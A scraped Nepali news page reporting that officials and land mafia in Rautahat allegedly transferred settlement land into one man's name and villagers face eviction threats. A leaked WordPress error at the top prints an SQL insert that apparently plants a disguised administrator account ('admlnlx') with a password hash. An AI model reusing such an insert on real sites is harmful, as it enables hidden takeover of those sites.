WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4CGd3jrK08mPAf8/9jxEqsLIhZXYm0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 13:03:31', '', 'admlnlx', 'admlnlx')
काठमाडौं माघ, ४ –
रौतहटमा सरकारी कर्मचारी र भूमाफिया मिलेर सिंगै बस्ती रहेको करिब ४ बिघा जग्गा व्यक्तिको नाममा नामसारी गराएका छन् ।
वर्षौदेखि उपभोग गर्दै आएको घरघडेरी खाली गर्नुपर्यो भन्दै अपरिचित व्यक्तिले दिनहुँ धम्याउन थालेपछि सिंगै गाउँ त्रस्त भएको छ ।लक्ष्मीनिया २, विजयपुरको जग्गा सरकारी कर्मचारी र भूमिफियाको मिलेमतोमा नवल किशोर राय यादवको नाममा नामसारी भएको हो । आजको नागरिक दैनिकमा समाचार छ ।
बस्तीसहितको २ बिघा ८ कठ्ठा जग्गा भने जिल्ला प्रशासनले तत्कालका लागि रोक्का गरेको छ ।उता, दिनहुँ बस्तीसहितको सिंगो गाउँ खाली गर्न, नत्र डोजर लगाएर भत्काउने धम्की आउन थालेपछि स्थानीय गुहार माग्न जिल्ला प्रशासन कार्यालय रौतहट पुगेका छन् ।